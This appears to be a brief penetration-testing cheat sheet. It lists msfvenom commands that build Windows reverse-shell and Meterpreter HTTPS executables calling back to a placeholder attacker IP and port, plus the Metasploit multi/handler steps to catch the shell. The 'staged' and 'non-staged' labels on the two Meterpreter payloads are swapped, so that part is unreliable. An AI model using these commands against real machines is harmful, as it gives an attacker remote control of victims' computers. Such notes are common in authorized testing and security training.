- Regular Non-Staged
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe -o /tmp/shell.exe
- Meterpreter Staged
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=IP LPORT=PORT -f exe -o /tmp/shell.exe
- Meterpreter Non Staged
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=IP LPORT=PORT -f exe -o /tmp/shell.exe
To receive the incoming shell (change the set payload to the one you set):
msfconsole -q
use multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost IP
set lport PORT
exploit